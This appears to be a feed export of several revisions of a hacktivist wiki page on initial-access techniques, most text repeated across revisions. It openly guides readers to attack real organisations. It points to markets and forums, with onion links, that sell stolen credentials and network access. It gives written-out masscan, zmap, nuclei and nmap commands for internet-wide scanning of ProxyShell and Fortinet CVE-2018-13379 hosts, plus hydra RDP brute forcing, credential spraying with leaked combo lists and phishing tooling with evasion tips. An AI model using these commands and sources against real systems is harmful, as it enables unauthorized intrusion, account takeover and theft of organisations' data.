* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List of IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1724</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1724"/>
		<updated>2024-03-25T17:11:10Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* VPN */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective&lt;br /&gt;
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/&lt;br /&gt;
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/&lt;br /&gt;
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* https://github.com/curtbraz/PhishAPI&lt;br /&gt;
* https://github.com/edoverflow/can-i-take-over-xyz&lt;br /&gt;
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/&lt;br /&gt;
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]&lt;br /&gt;
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office&lt;br /&gt;
&lt;br /&gt;
== Password Attacks ==&lt;br /&gt;
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show&#039;s the world that you don&#039;t need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!&lt;br /&gt;
&lt;br /&gt;
If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.&lt;br /&gt;
&lt;br /&gt;
=== Usernames ===&lt;br /&gt;
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.&lt;br /&gt;
&lt;br /&gt;
* https://github.com/digininja/CeWL&lt;br /&gt;
* https://github.com/Mebus/cupp&lt;br /&gt;
* https://github.com/digininja/RSMangler&lt;br /&gt;
* https://github.com/sc0tfree/mentalist&lt;br /&gt;
* https://github.com/urbanadventurer/username-anarchy&lt;br /&gt;
* https://github.com/vysecurity/LinkedInt&lt;br /&gt;
* https://github.com/initstring/linkedin2username&lt;br /&gt;
* https://github.com/shroudri/username_generator&lt;br /&gt;
&lt;br /&gt;
=== Passwords ===&lt;br /&gt;
Common and leaked credentials to test login portals and network services.&lt;br /&gt;
&lt;br /&gt;
==== Default passwords ====&lt;br /&gt;
* https://cirt.net/passwords&lt;br /&gt;
* https://default-password.info&lt;br /&gt;
* https://datarecovery.com/rd/default-passwords&lt;br /&gt;
* https://github.com/ihebski/DefaultCreds-cheat-sheet&lt;br /&gt;
&lt;br /&gt;
==== Common and leaked passwords ====&lt;br /&gt;
* https://wiki.skullsecurity.org/index.php?title=Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords&lt;br /&gt;
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases&lt;br /&gt;
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt&lt;br /&gt;
&lt;br /&gt;
=== Password cracking tools ===&lt;br /&gt;
&lt;br /&gt;
* https://github.com/byt3bl33d3r/SprayingToolkit&lt;br /&gt;
* https://www.kali.org/tools/hydra&lt;br /&gt;
* https://www.kali.org/tools/brutespray&lt;br /&gt;
* https://www.kali.org/tools/medusa&lt;br /&gt;
* https://www.kali.org/tools/patator&lt;br /&gt;
* https://github.com/1N3/BruteX&lt;br /&gt;
&lt;br /&gt;
=== Searching leaks ===&lt;br /&gt;
* https://github.com/khast3x/h8mail [Free but includes paid services]&lt;br /&gt;
&lt;br /&gt;
==== Services ====&lt;br /&gt;
&#039;&#039;&#039;Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.&lt;br /&gt;
&lt;br /&gt;
* https://haveibeenpwned.com&lt;br /&gt;
* https://leak-lookup.com [Paid. Accepts crypto (XMR &amp;amp; BTC)]&lt;br /&gt;
* https://dehashed.com [Paid. Accepts crypto (BTC)]&lt;br /&gt;
&lt;br /&gt;
Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.&lt;br /&gt;
&lt;br /&gt;
=== Password spraying ===&lt;br /&gt;
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.&lt;br /&gt;
 &lt;br /&gt;
* https://github.com/dafthack/MSOLSpray&lt;br /&gt;
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying&lt;br /&gt;
* https://github.com/blacklanternsecurity/TREVORspray&lt;br /&gt;
* https://github.com/knavesec/CredMaster&lt;br /&gt;
* https://github.com/xFreed0m/RDPassSpray&lt;br /&gt;
* https://github.com/dafthack/MailSniper&lt;br /&gt;
&lt;br /&gt;
=== Hash cracking ===&lt;br /&gt;
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!&lt;br /&gt;
&lt;br /&gt;
==== Identify hash ====&lt;br /&gt;
* https://github.com/blackploit/hash-identifier&lt;br /&gt;
&lt;br /&gt;
==== Online tools ====&lt;br /&gt;
* https://hashes.com/en/decrypt/hash [Free &amp;amp; Paid]&lt;br /&gt;
* https://crackstation.net&lt;br /&gt;
&lt;br /&gt;
==== Offline tools ====&lt;br /&gt;
* https://github.com/hashcat/hashcat&lt;br /&gt;
* https://github.com/openwall/john&lt;br /&gt;
* https://github.com/NotSoSecure/password_cracking_rules&lt;br /&gt;
&lt;br /&gt;
== Buying access ==&lt;br /&gt;
&lt;br /&gt;
You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.&lt;br /&gt;
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]&lt;br /&gt;
&lt;br /&gt;
You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).&lt;br /&gt;
&lt;br /&gt;
* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])&lt;br /&gt;
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])&lt;br /&gt;
&lt;br /&gt;
== Spray and pray ==&lt;br /&gt;
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.&lt;br /&gt;
&lt;br /&gt;
=== Prerequisites ===&lt;br /&gt;
There are some prerequisites you will need to follow the below examples:&lt;br /&gt;
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])&lt;br /&gt;
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]&lt;br /&gt;
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session&lt;br /&gt;
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].&lt;br /&gt;
&lt;br /&gt;
=== Networks ===&lt;br /&gt;
==== Vulnerability Scanning ====&lt;br /&gt;
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.&lt;br /&gt;
&lt;br /&gt;
Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;IP Ranges&#039;&#039;&#039;:&lt;br /&gt;
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges&lt;br /&gt;
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])&lt;br /&gt;
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks&lt;br /&gt;
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0&lt;br /&gt;
&lt;br /&gt;
===== Proxyshell =====&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/robertdavidgraham/masscan masscan]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;sed -i &#039;s/$/:443/&#039; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*&amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Exploit Discovered hosts: [[Proxyshell]]&lt;br /&gt;
&lt;br /&gt;
===== CVE-2018-13379 =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;awk &#039;{ print $4 &amp;quot;:&amp;quot; $3 }&#039; results.txt &amp;gt; final_results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Tool&#039;&#039;&#039;: [https://github.com/zmap/zmap zmap]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; Scan for Microsoft Exchange E-mail Servers:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
sudo zmap -q -p 443 | httpx -silent -s -sd -location \&lt;br /&gt;
&amp;gt; | awk &#039;/owa/ { print substr($1,9) }&#039; &amp;gt; owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE] &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -p 443 -Pn -n \&lt;br /&gt;
&amp;gt; --script http-vuln-exchange-proxyshell.nse -iL owa.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]&lt;br /&gt;
&lt;br /&gt;
===== Domains =====&lt;br /&gt;
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.&lt;br /&gt;
&lt;br /&gt;
See [[Domain Spray and Pray]] scanning.&lt;br /&gt;
&lt;br /&gt;
==== Password Attacks ====&lt;br /&gt;
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.&lt;br /&gt;
&lt;br /&gt;
===== RDP =====&lt;br /&gt;
&#039;&#039;&#039;1.&#039;&#039;&#039; [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== VPN =====&lt;br /&gt;
&#039;&#039;&#039;2.&#039;&#039;&#039; Virtual Private Network (VPN) Brute forcing:&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo &#039;[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+&#039; &amp;gt; results.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing&lt;/div&gt;</summary>
		<author><name>Booda</name></author>
	</entry>
	<entry>
		<id>https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1723</id>
		<title>Initial Access Tactics, techniques and procedures</title>
		<link rel="alternate" type="text/html" href="https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures&amp;diff=1723"/>
		<updated>2024-03-25T17:11:00Z</updated>

		<summary type="html">&lt;p&gt;Booda: /* RDP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Phishing ==&lt;br /&gt;
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.&lt;br /&gt;
&lt;br /&gt;
==== Tools ====&lt;br /&gt;
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html&lt;br /&gt;
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165&lt;br /&gt;
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55&lt;br /&gt;
* https://www.xanthus.io/mastering-the-simulated-phishing-attack&lt;br /&gt;
* https://github.com/Arno0x/EmbedInHTML&lt;br /&gt;
* https://github.com/L4bF0x/PhishingPretexts&lt;br /&gt;
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html&lt;br /&gt;
* https://book.hacktricks.xyz/phishing-methodology&lt;br /&gt;
